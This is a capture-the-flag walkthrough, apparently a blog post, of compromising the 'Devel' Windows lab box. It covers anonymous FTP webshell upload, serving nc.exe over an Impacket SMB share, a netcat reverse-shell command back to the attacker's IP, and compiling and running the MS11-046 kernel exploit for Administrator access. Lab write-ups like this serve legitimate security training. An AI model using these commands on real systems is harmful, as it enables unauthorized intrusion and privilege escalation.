Again, we start with nmap -sC -sV -oA ./devel 10.10.10.5
FTP with Anonymous login and IIS version 7.5. Hitting the web server just shows us the default IIS screen so let's check out FTP. First, I try putting a prepackaged aspx webshell onto the target. The one in "/usr/share/webshells/aspx/" discovered from https://highon.coffee/blog/reverse-shell-cheat-sheet/ will work beautifully. Then I navigate to it.
I try running nc from the web shell, but get a "This program cannot be run in DOS mode." error. Let's see if I can execute it from a network share via SMB. Impacket has a nice SMB server we can use. I create a new folder "Devel" and copy the windows binary into it (It is located at /usr/share/windows-resources/binaries/nc.exe). Next, move/copy the smbserver.py from /impacket/examples/smbserver.py into one level up from the new Devel folder. Last (for the SMB side anyway), run:
sudo python3 ./smbserver.py sharename Devel
Set up a netcat listener, "nc -lvnp 9999" and run "\\10.10.X.X\share\nc.exe -e cmd.exe 10.10.X.X 9999" in the webshell. Sucess! we have an initial shell.
There are a lot of Kernel Privesc ones there. Fortunately, there are a lot of kernel exploits in Sec Wiki's Github https://github.com/SecWiki/windows-kernel-exploits
Let's skip the tedium and jump right to the saying that none of these work. I eventually used Watson (https://github.com/rasta-mouse/Watson) to dig deeper. It eventually comes up with a different set of vulnerabilities. The one that matters is MS11-046
The C code for MS11-046 is located in "/usr/share/exploitdb/exploits/windows_x86/local/40564.c" and when we look at it, we get some instructions.
In order to run that # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 command, we need to install mingw-w64. Once installed and the exploit is complied, move it into the SMB folder you set up earlier. Final step: this box has been fun but I am ready for it to be over. From the netcat shell you have on the Victim PC, run \\YOURIP\share\MS11-046.exe. Congrats, you now have an Administrator shell.